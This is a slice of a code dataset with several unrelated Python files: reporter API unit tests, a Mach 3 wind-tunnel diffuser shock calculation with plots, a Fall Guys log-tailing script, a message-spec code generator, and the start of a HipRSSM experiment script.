self.assertEqual(202, reply.statusCode, reply.json)\n secondary_task_id = reply.json['task_id']\n self.wait_tasks_ready([secondary_task_id])\n reply = fsmRequests.getDoneTask(secondary_task_id)\n self.assertEqual(reply.statusCode, 200, 'Wrong report status_code, json: \"{}\"'.format(reply.json))\n self.assertEqual(reply.json['result']['errors']['errors'][0], {\n 'detail': 'Inconsistent input data found: \"Reporter got task {} with status \\'failed\\'\"'.format(\n primary_task_id), 'error_code': 15007})\n\n def test_wrong_task_type(self):\n reply = fsmRequests.createTaskHitTopN({\n \"list_id\": self.listPersons,\n \"top_n\": 4,\n \"description\": self.name\n })\n primary_task_id = reply.json['task_id']\n self.wait_tasks_ready([primary_task_id])\n reply = fsmRequests.createTaskReporter({\"task_id\": primary_task_id, \"format\": \"csv\", \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n secondary_task_id = reply.json['task_id']\n self.wait_tasks_ready([secondary_task_id])\n reply = fsmRequests.getDoneTask(secondary_task_id)\n self.assertEqual(reply.statusCode, 200, 'Wrong report status_code, json: \"{}\"'.format(reply.json))\n self.assertEqual(reply.json['result']['errors']['errors'][0],\n {'detail': 'Result generator is not implemented yet', 'error_code': 15006})\n\n def test_wrong_format(self):\n cross_match_task_id = self.cross_match_task_ids['descriptors_to_descriptors']\n reply = fsmRequests.createTaskReporter({\"task_id\": cross_match_task_id, \"format\": \"jpeg\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(reply.statusCode, 400)\n self.assertEqual(reply.json, {\n 'error_code': 12019,\n 'detail': \"Failed to validate input json. Path: 'format', message: ''jpeg' is not one of ['pdf', 'csv']'\"\n })\n\n # todo @skipIf(USE_LATEX, \"Latex enabled\")\n def test_forbidden_without_latex(self):\n if USE_LATEX:\n return\n reply = fsmRequests.createTaskReporter({\"task_id\": 777, \"format\": \"pdf\"})\n self.assertEqual(403, reply.statusCode, \"Got wrong status code\")\n self.assertDictEqual(\n {\"error_code\": 12025, \"detail\": \"LaTeX is disabled according to the current configuration\"},\n reply.json,\n \"Wrong error description\"\n )\n\n def test_additional_fields(self):\n perfect_task = {\n \"task_id\": 1011,\n \"format\": \"pdf\",\n \"parameters\": {\n \"colors_bounds\": {\n \"green\": 0.1,\n \"orange\": 0.2,\n \"red\": 0.3\n }\n },\n \"description\": self.name\n }\n self.corrupt_test(perfect_task, ('', 'parameters', 'parameters.colors_bounds'), fsmRequests.createTaskReporter)\n\n def test_location(self):\n reply = fsmRequests.createTaskReporter({\"task_id\": self.clusterizer_task_ids['descriptors'], \"format\": \"csv\",\n \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n done_task = fsmRequests.getDoneTask(task_id)\n self.assertEqual('/api/{}/reports/{}'.format(FSM2_API_VERSION, task_id),\n done_task.headers['Location'])\n","repo_name":"qonteo/luna","sub_path":"fsm2_linux_rel_v.2.0.0/tests/system_tests/unittests_reporter.py","file_name":"unittests_reporter.py","file_ext":"py","file_size_in_byte":22159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42015734903","text":"import numpy as np\r\nfrom GENozzle import GENozzle\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Define Constant Values\r\nk = 1.4\r\nR_air = 287.058 # J/kgK\r\n\r\nDataTable = pd.DataFrame(index=['M', 'Mns', 'T0', 'T', 'P0', 'P', 'Delta', 'Beta', 'Phi'],\r\n columns=['1', '2', '3', '4', '5', '6', '7', '8', '9', '10'])\r\n\r\n\r\n\r\ndef beta2(delta, mach, n):\r\n # n = 0 for weak oblique shock, n = 1 for strong shock\r\n mu = np.arcsin(1 / mach) # Mach wave angle\r\n b = -(((mach**2 + 2)/(mach**2)) + k*(np.sin(delta))**2)\r\n c = ((2*mach**2 + 1)/(mach**4)) + ((k+1)**2/(4) + (k-1)/(mach**2))*(np.sin(delta))**2\r\n d = -(np.cos(delta)**2/mach**4)\r\n v = (3*d - b**2)/9\r\n w = (9*b*c - 27*d - 2*b**2)/54\r\n D = v**3 + w**2\r\n phi = (1/3)*(np.arctan(np.sqrt(-D)/w))\r\n x_s = -b/3 + 2*np.sqrt(-v)*np.cos(phi)\r\n x_w = -b/3 - np.sqrt(-v)*(2*np.sqrt(-v)*np.cos(phi))\r\n \r\n if n == 0:\r\n B = np.arctan(np.sqrt(x_w/(1-x_w)))\r\n elif n == 1:\r\n B = np.arctan(np.sqrt(x_s/(1-x_s)))\r\n return B\r\n\r\n \r\n# Delta-Beta-Mach Relation functions\r\ndef delta(beta, mach):\r\n delt = np.arctan(2*np.cot(beta)*((mach**2*(np.sin(beta)**2) - 1)/(mach**2*(k + 2*np.cos(2*beta) + 2))))\r\n return delt\r\n\r\n\r\ndef beta(delt, mach, n):\r\n # n = 0 for weak oblique shock, n = 1 for strong shock\r\n mu = np.arcsin(1 / mach) # Mach wave angle\r\n c = np.tan(mu) ** 2\r\n a = ((k - 1) / 2 + (k + 1) * c / 2) * np.tan(delt)\r\n b = ((k + 1) / 2 + (k + 3) * c / 2) * np.tan(delt)\r\n d = np.sqrt(4 * (1 - 3 * a * b) ** 3 / ((27 * a ** 2 * c + 9 * a * b - 2) ** 2) - 1)\r\n Beta = np.arctan((b + 9 * a * c) / (2 * (1 - 3 * a * b)) - (d * (27 * a ** 2 * c + 9 * a * b - 2)) / (\r\n 6 * a * (1 - 3 * a * b)) * np.tan(n * np.pi / 3 + 1 / 3 * np.arctan(1 / d)))\r\n return Beta\r\n\r\n\r\n# Isentropic expansion ratio functions\r\ndef ToTt(k, M):\r\n return (1 + ((k-1)/2)*M**2)**-1\r\n\r\n\r\ndef PoPt(k, M):\r\n return (1 + ((k-1)/2)*M**2)**(-k/(k-1))\r\n\r\n\r\ndef rhoorhot(k, M):\r\n return (1 + ((k-1)/2)*M**2)**(-1/(k-1))\r\n\r\n\r\ndef AoAt(k, M):\r\n return (((k+1)*0.5)**(-(k+1)/(2*(k-1))))*((1 + ((k-1)*0.5)*M**2)**((k+1)/(2*(k-1)))/M)\r\n\r\n\r\ndef P2oP1(k, M):\r\n return (2*k*M**2 - (k - 1))/(k + 1)\r\n\r\n\r\ndef rho2orho1(k, M):\r\n return ((k+1)*M**2)/((k - 1)*M**2 + 2)\r\n\r\n\r\ndef T2oT1(k, M):\r\n return ((2*k*M**2 - (k - 1))*((k - 1)*M**2 + 2))/((k+1)**2*M**2)\r\n\r\n\r\ndef Mach2(k, M):\r\n return ((k-1)*M**2 + 2)/(2*k*M**2 - (k-1))\r\n\r\n\r\ndef Pt20Pt1(k, M):\r\n return (((k+1)*M**2)/((k-1)*M**2 + 2))**(k/(k-1))*((k+1)/(2*k*M**2 - (k-1)))**(1/(k-1))\r\n\r\nMe = 3\r\nT1 = 225 #K\r\nP1 = 3.5 # Kpa\r\nk = 1.4\r\nrho1 = 0.0542 # kg/m3\r\n# Me = 5\r\n# T1 = 154 #K\r\n# P1 = 3.0 # Kpa\r\n# k = 1.4\r\n# rho1 = 0.0679 # kg/m3\r\n# Me = 7\r\n# T1 = 86 #K\r\n# P1 = 1.5 # Kpa\r\n# k = 1.4\r\n# rho1 = 0.0608 # kg/m3\r\n# Me = 10\r\n# T1 = 50 #K\r\n# P1 = 0.5 # Kpa\r\n# k = 1.4\r\n# rho1 = 0.0348 # kg/m3\r\na1 = np.sqrt(k*R_air*T1)\r\nv = Me*a1\r\np01 = (P1*1000 + 0.5*rho1*v**2)/1000\r\ndelt = np.deg2rad(9)\r\n\r\nDataTable.at['Delta', '1'] = np.rad2deg(delt)\r\nDataTable.at['P', '1'] = P1\r\nDataTable.at['P0', '1'] = p01\r\nDataTable.at['T', '1'] = T1\r\nDataTable.at['M', '1'] = Me\r\n\r\n\r\n\r\n\r\n\r\n# Generate Mach 3 Nozzle using GE nozzle class\r\nmesh_size = 75\r\nradius_of_expansion = 1.4\r\nNozzle = GENozzle(k, Me, mesh_size, radius_of_expansion)\r\n# Test section height and width\r\ntest_section_h_w = 1.9860 # m\r\n# Test section length\r\ntest_section_length = 2.286\r\n# get nozzle scaled throat height\r\nthroat_height = Nozzle.get_scaled_throat_height(test_section_h_w)\r\n# Get nozzle points scaled to exit height\r\nxnozz, ynozz = Nozzle.scale_wall_points(test_section_h_w)\r\n# second throat height\r\nthroat2_height = throat_height/Pt20Pt1(1.4, Me) # m\r\n\r\nplt.figure()\r\nplt.axis('equal')\r\nplt.grid()\r\nplt.title('Mach 3 Wind Tunnel')\r\n# plot the nozzle upper and lower contours\r\nplt.plot(xnozz, -ynozz)\r\n#plot the test section walls\r\nplt.hlines(-ynozz[-1], xnozz[-1], xnozz[-1]+test_section_length)\r\n\r\n# Save endpoints of test section walls\r\ny0 = ynozz[-1]\r\nx0 = xnozz[-1]+test_section_length\r\n\r\n\r\n# Normal Shock at Mach 3 to get rough estimate for throat2 height\r\nNS_relation = Pt20Pt1(1.4, Me)\r\n\r\n# Calculate the height from the 'floor' to the bottom of the second throat\r\nh2 = 0.5*test_section_h_w - 0.5*throat2_height\r\n# Use that length and the wedge angle to find the length of the wedge section\r\nL2 = h2/np.tan(delt)\r\n# Plot the diffuser wedges\r\n# x0, y0 = 0, 0\r\ny1 = y0-h2\r\nx1 = x0 + L2\r\n# Plot the converging diffuser sections\r\nplt.plot([x0, x0 + L2], [-y0, -y0 + h2])\r\n\r\n# Calculate the first shockwaves\r\nbeta1 = beta(delt, Me, 0)\r\nDataTable.at['Beta', '1'] = np.rad2deg(beta1)\r\n# Calculate the new properties across the first oblique shock, lower side\r\n# Calculate the normal mach number\r\nM1NS = Me*np.sin(beta1)\r\nDataTable.at['Mns', '1'] = M1NS\r\n# Mach number behind shock\r\nM2 = Mach2(k, M1NS)/np.sin(beta1-delt)\r\nDataTable.at['M', '2'] = M2\r\n# Pressure and Temperature behind shock\r\nP2 = P2oP1(k, M1NS)*P1\r\nT2 = T2oT1(k, M1NS)*T1\r\nDataTable.at['P', '2'] = P2\r\nDataTable.at['T', '2'] = T2\r\n# Total Pressure and temperature behind shock\r\np02 = ( Pt20Pt1(k, M1NS)/PoPt(k, Me))*P1\r\nT02 = T1/ToTt(k, Me)\r\nDataTable.at['P0', '2'] = p02\r\nDataTable.at['T0', '2'] = T02\r\n# Delta stays the same\r\nDataTable.at['Delta', '2'] = np.rad2deg(delt)\r\n# Calculate the angle of the first oblique shock\r\nLS23 = (0.5*test_section_h_w)/np.tan(beta1)\r\n# find the point at which the shocks interact\r\nyA = 0\r\nxA = x0 + LS23\r\n# Plot the initial oblique shocks\r\nplt.plot([x0, xA], [-y0, yA], linestyle='dashed')\r\n\r\n\r\n\r\n\r\n# Section 2 to 3\r\n# Beta for the first shock reflection (shock going back down)\r\nbeta2 = beta(delt, M2, 0)\r\nDataTable.at['Beta', '2'] = np.rad2deg(beta2)\r\n# Normal mach number\r\nM2NS = M2*np.sin(beta2)\r\nDataTable.at['Mns', '2'] = M2NS\r\n# Mach number behind shock\r\nM3 = Mach2(k, M2NS)/np.sin(beta2-delt)\r\nDataTable.at['M', '3'] = M3\r\n# Calculate temp and pressure after the shock\r\nP3 = P2oP1(k, M2NS)*P2\r\nT3 = T2oT1(k, M2NS)*T2\r\nDataTable.at['P', '3'] = P3\r\nDataTable.at['T', '3'] = T3\r\n# Total temp and pressure after shock\r\np03 = (Pt20Pt1(k, M2NS)/PoPt(k, M2))*P2\r\nT03 = T1/ToTt(k, M2)\r\nDataTable.at['P0', '3'] = p03\r\nDataTable.at['T0', '3'] = T03\r\n# Angle that shock makes with the centerline\r\nPHI2 = beta2-delt\r\nDataTable.at['Phi', '2'] = np.rad2deg(PHI2)\r\n# Plot second shock wave\r\ny3 = -y0\r\nx3 = xA + (0.5*throat2_height)/np.tan(PHI2)\r\nplt.plot([xA, x3], [0, -y1], linestyle='dashed')\r\n# Delta angle stays the same\r\nDataTable.at['Delta', '3'] = np.rad2deg(delt)\r\n\r\n\r\n\r\n\r\n# Section 3 to 4 ( third shock wave, reflection back up\r\nbeta3 = beta(0.01, M3, 0)\r\nDataTable.at['Beta', '3'] = np.rad2deg(beta3)\r\n# Normal mach number\r\nM3NS = M3*np.sin(beta3)\r\nDataTable.at['Mns', '3'] = M3NS\r\n# Mach number after shock\r\nM4 = Mach2(k, M3NS)/np.sin(beta3)\r\nDataTable.at['M', '4'] = M4\r\n# Temp and pressure after shock\r\nP4 = P2oP1(k, M3NS)*P3\r\nT4 = T2oT1(k, M3NS)*T3\r\nDataTable.at['P', '4'] = P4\r\nDataTable.at['T', '4'] = T4\r\n# total temp and pressure after shock\r\np04 = (Pt20Pt1(k, M3NS)/PoPt(k, M3))*P3\r\nT04 = T1/ToTt(k, M3)\r\nDataTable.at['P0', '4'] = p04\r\nDataTable.at['T0', '4'] = T04\r\n# angle shock makes with lower wall\r\nPHI3 = beta3\r\nDataTable.at['Phi', '3'] = np.rad2deg(PHI3)\r\n# Plot shock\r\nx4 = x3 + (0.5*throat2_height)/np.tan(PHI3)\r\nplt.plot([x3, x4], [-y1, 0], linestyle='dashed')\r\n# Delta stays the same\r\nDataTable.at['Delta', '4'] = 0\r\n\r\n\r\n# Section 4 to 5 ( Fourth shock wave, reflection down again)\r\nbeta4 = beta(0.01, M4, 0)\r\nDataTable.at['Beta', '4'] = np.rad2deg(beta4)\r\n# Normal mach number\r\nM4NS = M4*np.sin(beta4)\r\nDataTable.at['Mns', '4'] = M4NS\r\n# Mach number after shock\r\nM5 = Mach2(k, M4NS)/np.sin(beta4)\r\nDataTable.at['M', '5'] = M5\r\n# Temp and pressure after shock\r\nP5 = P2oP1(k, M4NS)*P4\r\nT5 = T2oT1(k, M4NS)*T4\r\nDataTable.at['P', '5'] = P5\r\nDataTable.at['T', '5'] = T5\r\n# total temp and pressure after shock\r\np05 = (Pt20Pt1(k, M4NS)/PoPt(k, M4))*P4\r\nT05 = T1/ToTt(k, M4)\r\nDataTable.at['P0', '5'] = p05\r\nDataTable.at['T0', '5'] = T05\r\n# angle shock makes with lower wall\r\nPHI4 = beta4\r\nDataTable.at['Phi', '4'] = np.rad2deg(PHI4)\r\n# Plot shock\r\nx5 = x4 + (0.5*throat2_height)/np.tan(PHI4)\r\nplt.plot([x4, x5], [0, -y1], linestyle='dashed')\r\n# Delta stays the same\r\nDataTable.at['Delta', '5'] = 0\r\n\r\n\r\n\r\n# Section 5 to 6 ( Fifth shock wave, reflection up again)\r\nbeta5 = beta(0.01, M5, 0)\r\nDataTable.at['Beta', '5'] = np.rad2deg(beta5)\r\n# Normal mach number\r\nM5NS = M5*np.sin(beta5)\r\nDataTable.at['Mns', '5'] = M5NS\r\n# Mach number after shock\r\nM6 = Mach2(k, M5NS)/np.sin(beta5)\r\nDataTable.at['M', '6'] = M6\r\n# Temp and pressure after shock\r\nP6 = P2oP1(k, M5NS)*P5\r\nT6 = T2oT1(k, M5NS)*T5\r\nDataTable.at['P', '6'] = P6\r\nDataTable.at['T', '6'] = T6\r\n# total temp and pressure after shock\r\np06 = (Pt20Pt1(k, M5NS)/PoPt(k, M5))*P5\r\nT06 = T1/ToTt(k, M5)\r\nDataTable.at['P0', '6'] = p06\r\nDataTable.at['T0', '6'] = T06\r\n# angle shock makes with lower wall\r\nPHI5 = beta5\r\nDataTable.at['Phi', '5'] = np.rad2deg(PHI5)\r\n# Plot shock\r\nx6 = x5 + (0.5*throat2_height)/np.tan(PHI5)\r\nplt.plot([x5, x6], [-y1, 0], linestyle='dashed')\r\n# Delta stays the same\r\nDataTable.at['Delta', '6'] = 0\r\n\r\n\r\n\r\n\r\n# Section 6 to 7 (sixth shock wave, reflection up again)\r\nbeta6 = beta(0.01, M6, 0)\r\nDataTable.at['Beta', '6'] = np.rad2deg(beta6)\r\n# Normal mach number\r\nM6NS = M6*np.sin(beta6)\r\nDataTable.at['Mns', '6'] = M6NS\r\n# Mach number after shock\r\nM7 = Mach2(k, M6NS)/np.sin(beta6)\r\nDataTable.at['M', '7'] = M7\r\n# Temp and pressure after shock\r\nP7 = P2oP1(k, M5NS)*P6\r\nT7 = T2oT1(k, M5NS)*T6\r\nDataTable.at['P', '7'] = P7\r\nDataTable.at['T', '7'] = T7\r\n# total temp and pressure after shock\r\np07 = (Pt20Pt1(k, M6NS)/PoPt(k, M6))*P6\r\nT07 = T1/ToTt(k, M6)\r\nDataTable.at['P0', '7'] = p07\r\nDataTable.at['T0', '7'] = T07\r\n# angle shock makes with lower wall\r\nPHI6 = beta6\r\nDataTable.at['Phi', '6'] = np.rad2deg(PHI6)\r\n# Plot shock\r\nx7 = x6 + (0.6*throat2_height)/np.tan(PHI6)\r\nplt.plot([x6, x7], [0, -y1], linestyle='dashed')\r\n# Delta stays the same\r\nDataTable.at['Delta', '7'] = 0\r\n\r\n\r\n\r\n\r\n\r\n\r\n# Section 7 to 8 ( seventh shock wave, reflection up again)\r\nbeta7 = beta(0.01, M7, 0)\r\nDataTable.at['Beta', '7'] = np.rad2deg(beta7)\r\n# Normal mach number\r\nM7NS = M7*np.sin(beta7)\r\nDataTable.at['Mns', '7'] = M7NS\r\n# Mach number after shock\r\nM8 = Mach2(k, M7NS)/np.sin(beta7)\r\nDataTable.at['M', '8'] = M8\r\n# Temp and pressure after shock\r\nP8 = P2oP1(k, M5NS)*P7\r\nT8 = T2oT1(k, M5NS)*T7\r\nDataTable.at['P', '8'] = P8\r\nDataTable.at['T', '8'] = T8\r\n# total temp and pressure after shock\r\np08 = (Pt20Pt1(k, M7NS)/PoPt(k, M7))*P7\r\nT08 = T1/ToTt(k, M7)\r\nDataTable.at['P0', '8'] = p08\r\nDataTable.at['T0', '8'] = T08\r\n# angle shock makes with lower wall\r\nPHI7 = beta7\r\nDataTable.at['Phi', '7'] = np.rad2deg(PHI7)\r\n# Plot shock\r\nx8 = x7 + (0.7*throat2_height)/np.tan(PHI7)\r\nplt.plot([x7, x8], [-y1, 0], linestyle='dashed')\r\n# Delta stays the same\r\nDataTable.at['Delta', '8'] = 0\r\n\r\n\r\n\r\n\r\n# Section 8 to 9 ( eighth shock wave, reflection up again)\r\nbeta8 = beta(0.01, M8, 0)\r\nDataTable.at['Beta', '8'] = np.rad2deg(beta8)\r\n# Normal mach number\r\nM8NS = M8*np.sin(beta8)\r\nDataTable.at['Mns', '8'] = M8NS\r\n# Mach number after shock\r\nM9 = Mach2(k, M8NS)/np.sin(beta8)\r\nDataTable.at['M', '9'] = M9\r\n# Temp and pressure after shock\r\nP9 = P2oP1(k, M5NS)*P8\r\nT9 = T2oT1(k, M5NS)*T8\r\nDataTable.at['P', '9'] = P9\r\nDataTable.at['T', '9'] = T9\r\n# total temp and pressure after shock\r\np09 = (Pt20Pt1(k, M8NS)/PoPt(k, M8))*P8\r\nT09 = T1/ToTt(k, M8)\r\nDataTable.at['P0', '9'] = p09\r\nDataTable.at['T0', '9'] = T09\r\n# angle shock makes with lower wall\r\nPHI8 = beta8\r\nDataTable.at['Phi', '8'] = np.rad2deg(PHI8)\r\n# Plot shock\r\nx9 = x8 + (0.8*throat2_height)/np.tan(PHI8)\r\nplt.plot([x8, x9], [0, -y1], linestyle='dashed')\r\n# Delta stays the same\r\nDataTable.at['Delta', '9'] = 0\r\n\r\n\r\n\r\n\r\n# Section 9 to 10 ( Ninth shock wave, reflection up again)\r\nbeta9 = beta(0.01, M9, 0)\r\nDataTable.at['Beta', '9'] = np.rad2deg(beta9)\r\n# Normal mach number\r\nM9NS = M9*np.sin(beta9)\r\nDataTable.at['Mns', '9'] = M9NS\r\n# Mach number after shock\r\nM10 = Mach2(k, M9NS)/np.sin(beta9)\r\nDataTable.at['M', '10'] = M10\r\n# Temp and pressure after shock\r\nP10 = P2oP1(k, M5NS)*P9\r\nT10 = T2oT1(k, M5NS)*T9\r\nDataTable.at['P', '10'] = P10\r\nDataTable.at['T', '10'] = T10\r\n# total temp and pressure after shock\r\np010 = (Pt20Pt1(k, M9NS)/PoPt(k, M9))*P9\r\nT010 = T1/ToTt(k, M9)\r\nDataTable.at['P0', '10'] = p010\r\nDataTable.at['T0', '10'] = T010\r\n# angle shock makes with lower wall\r\nPHI9 = beta9\r\nDataTable.at['Phi', '9'] = np.rad2deg(PHI9)\r\n# Plot shock\r\nx10 = x9 + (0.9*throat2_height)/np.tan(PHI9)\r\nplt.plot([x9, x10], [-y1, 0], linestyle='dashed')\r\n# Delta stays the same\r\nDataTable.at['Delta', '10'] = 0\r\n\r\nplt.hlines(0, 0, x10, color='k')\r\nplt.hlines((-y0 + h2), x1, x10, color='k')\r\n\r\n\r\n\r\nprint(DataTable)\r\n\r\n\r\n########## Plot the full diffuser ##################\r\nplt.figure()\r\ny0 = ynozz[-1]\r\nx0 = 0\r\nx1 = x0 + L2\r\n# Plot the converging diffuser section\r\nplt.plot([x0, x1], [-y0, -y0 + h2], color='k')\r\nplt.plot([x0, x1], [y0, y0 - h2], color='k')\r\n\r\n\r\n#plot the first oblique shock\r\nxA = x0 + LS23\r\nplt.plot([x0, xA], [-y0, yA], linestyle='dashed')\r\nplt.plot([x0, xA], [y0, yA], linestyle='dashed')\r\n\r\n# Plot the second oblique shock\r\nx3 = xA + (0.5*throat2_height)/np.tan(PHI2)\r\nplt.plot([xA, x3], [0, -y1], linestyle='dashed')\r\nplt.plot([xA, x3], [0, y1], linestyle='dashed')\r\n\r\n# Plot the third oblique shock\r\nx4 = x3 + (0.5*throat2_height)/np.tan(PHI3)\r\nplt.plot([x3, x4], [-y1, yA], linestyle='dashed')\r\nplt.plot([x3, x4], [y1, yA], linestyle='dashed')\r\n\r\n# Plot the fourth oblique shock\r\nx5 = x4 + (0.5*throat2_height)/np.tan(PHI4)\r\nplt.plot([x4, x5], [yA, -y1], linestyle='dashed')\r\nplt.plot([x4, x5], [yA, y1], linestyle='dashed')\r\n\r\n# Plot the fifth oblique shock\r\nx6 = x5 + (0.5*throat2_height)/np.tan(PHI5)\r\nplt.plot([x5, x6], [-y1, yA], linestyle='dashed')\r\nplt.plot([x5, x6], [y1, yA], linestyle='dashed')\r\n\r\n# Plot the sixth oblique shock\r\nx7 = x6 + (0.5*throat2_height)/np.tan(PHI6)\r\nplt.plot([x6, x7], [yA, -y1], linestyle='dashed')\r\nplt.plot([x6, x7], [yA, y1], linestyle='dashed')\r\n\r\n# Plot the seventh oblique shock\r\nx8 = x7 + (0.5*throat2_height)/np.tan(PHI7)\r\nplt.plot([x7, x8], [-y1, yA], linestyle='dashed')\r\nplt.plot([x7, x8], [y1, yA], linestyle='dashed')\r\n\r\n# Plot the eigth oblique shock\r\nx9 = x8 + (0.5*throat2_height)/np.tan(PHI8)\r\nplt.plot([x8, x9], [yA, -y1], linestyle='dashed')\r\nplt.plot([x8, x9], [yA, y1], linestyle='dashed')\r\n\r\n# Plot the Ninth oblique shock\r\nx10 = x9 + (0.5*throat2_height)/np.tan(PHI9)\r\nplt.plot([x9, x10], [-y1, yA], linestyle='dashed')\r\nplt.plot([x9, x10], [y1, yA], linestyle='dashed')\r\n\r\n# Plot the constant area diffuser section\r\nplt.hlines((-y0 + h2), x1, x10, color='k')\r\nplt.hlines((y0 - h2), x1, x10, color='k')\r\n\r\nprint(x10)\r\n# plt.title('Mach 3 Diffuser (incomplete)')\r\n\r\n\r\nplt.show()\r\nprint()\r\n","repo_name":"matthewelmer/LANL_WT","sub_path":"Diffuser2.py","file_name":"Diffuser2.py","file_ext":"py","file_size_in_byte":14855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6018232976","text":"import time\ndef follow(thefile):\n\tthefile.seek(0,2)\n\twhile True:\n\t\tline = thefile.readline()\n\t\tif not line:\n\t\t\ttime.sleep(0.1)\n\t\t\tcontinue\n\t\tyield line\n\nif __name__ == '__main__':\n\tlogfile = open(\"C:/Users/anshu/AppData/LocalLow/Mediatonic/FallGuys_client/Player.log\",\"r\")\n\tloglines = follow(logfile)\n\tprint(\"running\")\n\tstate = None\n\tscene = None\n\tfor line in loglines:\n\t\tif \"\\\"state\\\":\" in line:\n\t\t\tstate = line.strip().split(\": \")[-1]\n\t\telif \"[ClientGameSession] NumPlayersAchievingObjective=0\" in line:\n\t\t\tstate = \"started\"\n\t\telif \"SquadManager::GetSquadScore squadId\" in line:\n\t\t\tstate = \"ended\"\n\n\t\tif \"[StateGameLoading] Loading game level scene\" in line:\n\t\t\tscene = line.split(\"scene\")[-1].strip()\n\t\t# if \"squad\" in line:\n\t\tprint(\"state\",state,\"\\t\",\"scene\",scene,\"\\t\\t\\t\",line.strip())\n\t\t\t# state started scene None 23:21:02.222: SquadManager::GetSquadScore squadId0 not found return 0","repo_name":"Anshuman-UCSB/fallen-men","sub_path":"data_collection.py","file_name":"data_collection.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19851415343","text":"import logging\nimport GenMsgAST\nimport GenMsgBase\nimport sys\n\nclass MsgSpecGenerator(GenMsgBase.CodeGenerator):\n \"\"\"\n This is a text generator for C{MessageAST}.\n \n This generator should produce almost the same output\n as the input message specification file. \n \"\"\"\n\n def generatorName(cls):\n return 'MsgSpec'\n\n generatorName = classmethod(generatorName)\n\n def __init__(self, MessageAST):\n super(MsgSpecGenerator, self).__init__(MessageAST, '//')\n self.logger = logging.Logger('MsgSpecGenerator')\n self.logger.setLevel(logging.ERROR)\n self.logger.addHandler(logging.StreamHandler(sys.stdout))\n self.__languageName = 'MsgSpec'\n\n def generate(\n self,\n stream,\n what,\n factoryOnly=False,\n ):\n \"\"\"\n Redefine super.generate.\n \n what is not important in this case.\n \"\"\"\n\n # Generate package\n if self.AST.hasPackage():\n self.writeComment(stream, self.AST.package)\n stream.write('package %s\\n' % self.AST.package.name)\n\n # Generate version\n if self.AST.hasVersion():\n self.writeComment(stream, self.AST.version)\n stream.write('version %d.%d\\n' % self.AST.version.number)\n\n if not factoryOnly:\n # Generate native type\n for native in self.AST.natives:\n self.writeComment(stream, native)\n stream.write('native %s {\\n' % native.name)\n self.indent()\n if native.hasRepresentation():\n stream.write(self.getIndent() + 'representation '\n + native.getRepresentation() + '\\n')\n for (k, v) in native.languages.items():\n for l in v:\n stream.write(self.getIndent() + 'language ' + k\n + ' [' + l.statement + ']\\n')\n self.unIndent()\n stream.write('}\\n')\n\n # Generate enum\n for enum in self.AST.enums:\n self.writeComment(stream, enum)\n stream.write('enum %s {\\n' % enum.name)\n first = True\n self.indent()\n for enumval in enum.values:\n if first:\n stream.write(self.getIndent() + '%s = %d, '\n % (enumval.name, enumval.value))\n first = False\n else:\n stream.write(self.getIndent() + '%s, '\n % enumval.name)\n self.writeComment(stream, enumval)\n self.unIndent()\n stream.write('''}\n\n''')\n\n # Generate message type\n for msg in self.AST.messages:\n self.writeComment(stream, msg)\n stream.write('message %s' % msg.name)\n if msg.hasMerge():\n stream.write(' : merge %s {\\n' % msg.merge.name)\n else:\n stream.write(' {\\n')\n\n for field in msg.fields:\n if isinstance(field,\n GenMsgAST.MessageType.CombinedField):\n stream.write(' combined %s {'\n % field.typeid)\n self.writeComment(stream, field)\n for cfield in field.fields:\n stream.write(' %s %s %s '\n % (cfield.qualifier,\n cfield.typeid.name, cfield.name))\n if cfield.hasDefaultValue():\n stream.write('[default=%s] '\n % cfield.defaultValue)\n self.writeComment(stream, cfield)\n stream.write(' }\\n')\n else:\n stream.write(' %s %s %s '\n % (field.qualifier, field.typeid.name,\n field.name))\n if field.hasDefaultValue():\n stream.write('[default=%s] '\n % field.defaultValue)\n self.writeComment(stream, field)\n stream.write('''}\n\n''')\n\n # Generate Factory\n if self.AST.hasFactory():\n self.writeComment(stream, self.AST.factory)\n stream.write('factory %s {\\n' % self.AST.factory.name)\n self.indent()\n if self.AST.factory.hasFactoryCreator():\n stream.write(self.getIndent() + 'factoryCreator %s %s(%s)\\n'\n % self.AST.factory.creator)\n if self.AST.factory.hasFactoryReceiver():\n stream.write(self.getIndent()\n + 'factoryReceiver %s %s(%s)\\n'\n % self.AST.factory.receiver)\n self.unIndent()\n stream.write('''}\n\n''')\n","repo_name":"etopzone/CERTI","sub_path":"scripts/GenMsgSpec.py","file_name":"GenMsgSpec.py","file_ext":"py","file_size_in_byte":5098,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"37"} +{"seq_id":"40951393421","text":"import sys\nsys.path.append('.')\nfrom omegaconf import DictConfig, OmegaConf\nimport hydra\nimport os\n\nimport torch\nimport wandb\n\nfrom data.mobileDataSeq import metaMobileData\nfrom metaWorldModels.hiprssm import HipRSSM\nfrom learning import hiprssm_dyn_trainer\nfrom inference import hiprssm_dyn_inference\nfrom utils.metrics import root_mean_squared\n\nnn = torch.nn\n\n\ndef generate_mobile_robot_data_set(data):\n train_windows, test_windows = data.train_windows, data.test_windows\n\n train_targets = train_windows['target']\n test_targets = test_windows['target']\n\n train_obs = train_windows['obs']\n test_obs = test_windows['obs']\n\n train_task_idx = train_windows['task_index']\n test_task_idx = test_windows['task_index']\n\n train_act = train_windows['act']\n test_act = test_windows['act']\n print(test_act.shape, train_act.shape)\n\n return torch.from_numpy(train_obs).float(), torch.from_numpy(train_act).float(), torch.from_numpy(train_targets).float(), torch.from_numpy(train_task_idx).float(),\\\n torch.from_numpy(test_obs).float(), torch.from_numpy(test_act).float(), torch.from_numpy(test_targets).float(), torch.from_numpy(test_task_idx).float()\n\n@hydra.main(config_path='conf',config_name='config')\ndef my_app(cfg)->OmegaConf:\n global config\n model_cfg = cfg.model\n exp = Experiment(model_cfg)\n\n\nclass Experiment():\n def __init__(self, cfg):\n self.global_cfg = cfg\n self._experiment()\n\n\n def _experiment(self):\n \"\"\"Data\"\"\"\n 